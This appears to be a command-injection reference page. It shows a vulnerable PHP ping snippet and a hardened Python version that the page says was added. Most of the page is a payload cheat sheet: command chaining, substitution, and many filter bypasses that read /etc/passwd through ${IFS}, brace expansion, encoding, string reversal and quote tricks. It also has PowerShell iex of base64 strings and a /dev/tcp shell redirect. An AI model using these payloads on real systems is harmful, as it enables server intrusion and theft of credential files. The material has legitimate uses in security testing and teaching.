Command Injection

Command injection is a security flaw that allows attackers to run arbitrary system commands on a server. It occurs when user input is improperly validated and passed to a shell or command-line interpreter.

Vulnerable Code

The following example shows user input being passed straight into the system() function without validation of any kind.

<?php
// Vulnerable: $user flows from the query string into a shell command unchanged.
$user = $_GET['user'];
echo system("ping -c 1 " . $user);

If an attacker provides input like 8.8.8.8; cat /etc/passwd, the actual command that gets executed would be: ping -c 1 8.8.8.8; cat /etc/passwd.
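As an added example (not part of the original page, and written in Python rather than the page's PHP), this is the hardened counterpart of the snippet above. It applies the two fixes that close the flaw: the parameter is checked against an allow-list (a literal IP address or a plain hostname), and the command is run as an argv list with no shell, so `;`, `|`, backticks, `$(...)` and `${IFS}` are never parsed as syntax. The function names are this example's own; in PHP the same measures are an allow-list check followed by escapeshellarg(), or a proc_open() call with an array command so that no shell is involved.

```python
"""Hardened counterpart to the vulnerable ping snippet (added example).

Defence 1: allow-list validation of the target (IP address or RFC 1123 hostname).
Defence 2: subprocess.run() with an argv list and no shell=True, so the
operating system executes ping directly and nothing interprets metacharacters.
"""
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: alphanumerics and hyphens, 1-63 chars,
# no leading or trailing hyphen (so a label can never look like an option).
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_safe_target(user_input: str) -> bool:
    """Return True only for a literal IPv4/IPv6 address or a plain hostname."""
    try:
        ipaddress.ip_address(user_input)
        return True
    except ValueError:
        pass
    if not user_input or len(user_input) > 253:
        return False
    # Every dot-separated label must match; any ';', '|', '$', '{', space,
    # newline or tab fails the character class and rejects the whole input.
    return all(_LABEL.match(label) for label in user_input.split("."))


def build_ping_argv(user_input: str) -> list:
    """Build the argv list for ping; raise instead of forwarding bad input."""
    if not is_safe_target(user_input):
        raise ValueError("target must be an IP address or hostname")
    return ["ping", "-c", "1", user_input]


def ping(user_input: str, timeout: float = 5.0) -> str:
    """Run ping for a validated target and return its stdout."""
    argv = build_ping_argv(user_input)
    # No shell=True: argv goes straight to the OS, so "8.8.8.8; cat /etc/passwd"
    # could only ever be a single (already rejected) argument, never two commands.
    result = subprocess.run(argv, capture_output=True, text=True, timeout=timeout)
    return result.stdout


if __name__ == "__main__":
    for candidate in ["8.8.8.8", "8.8.8.8; cat /etc/passwd", "cat${IFS}/etc/passwd"]:
        print(f"{candidate!r}: {'accepted' if is_safe_target(candidate) else 'rejected'}")
```

The allow-list is the primary control; the argv-list execution is defence in depth, so that even a validation bug cannot turn the parameter into shell syntax.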

Automated Tools


Chaining Commands

command1; command2   # Execute command1 and then command2
command1 && command2 # Execute command2 only if command1 succeeds
command1 || command2 # Execute command2 only if command1 fails
command1 & command2 # Execute command1 in the background
command1 | command2 # Pipe the output of command1 into command2
command1%0acommand2 # We can also try new line = %0a (\n)

Substitution

`cat /etc/passwd`    # Using backtick
$(cat /etc/passwd) # Using $()

# More Tricks
who$()ami
who$(echo am)i
who`echo am`i

Filter Bypasses

Space is not Allowed

# Using special shell variable called the 'Internal Field Separator'
cat${IFS}/etc/passwd
ls${IFS}-la

# Brace Expansion
{cat,/etc/passwd}
{ls,-la}

# Input redirection
cat</etc/passwd
sh</dev/tcp/127.0.0.1/4242

# Windows Specific (Using Environment Variables)
ping%CommonProgramFiles:~10,-18%127.0.0.1
ping%PROGRAMFILES:~10,-5%127.0.0.1
ping$env:PROGRAMFILES[10]127.0.0.1 # PowerShell Specific

# Must Try
# Use tabs instead of spaces with this URL-Encoded: %09

Backslash (\) Newline

rezy@dev:~$ cat /et\
c/pa\
sswd

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[//..SNIP..//]

# URL-Encoded Version
cat%20/et%5C%0Ac/pa%5C%0Asswd

Tilde Expansion

echo ~+ # shows the current working directory ($PWD).
echo ~- # shows the previous working directory ($OLDPWD).

More Brace Expansion

{,ip,a}
{,ifconfig}
{,ifconfig,eth0}
{l,-lh}s
{,echo,#test}
{,$"whoami",}
{,/?s?/?i?/c?t,/e??/p??s??,}

/ is not Allowed

We can use environment variables to retrieve forward slashes.

# Using ${HOME:0:1}
cat ${HOME:0:1}etc${HOME:0:1}passwd

# Using ${PATH:0:1}
cat ${PATH:0:1}etc${PATH:0:1}passwd

# Using:
# echo . | tr '!-0' '"-1'
# Or
# tr '!-0' '"-1' <<< .
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Bypass Using Encoding

# Hex Encoding
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
cat `xxd -r -p <<< 2f6574632f706173737764`

# Base64 Encoding
echo -n 'cat /etc/passwd' | base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dk)

# Windows (PowerShell) - Execute Base64 String
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"

Reverse Strings

echo 'cat /etc/passwd' | rev

# Execute (Linux)
$(rev<<<'dwssap/cte/ tac')

# Execute (Windows)
iex "$('imaohw'[-1..-20] -join '')"

Quotes and Backticks

# Single
w'h'o'am'i
wh''oami
'w'hoami

# Double
w"h"o"am"i
wh""oami
"wh"oami

# Backticks
wh``oami

Backslash and Slash

w\ho\am\i
/\b\i\n/////s\h

Positional Parameter Character ($@) and Caret

$0 refers to the name of the script if it is being run as a script. In an interactive shell session, $0 will typically give the name of the shell.

# $@
who$@ami
echo whoami|$0

# Caret (WINDOWS/CMD)
who^ami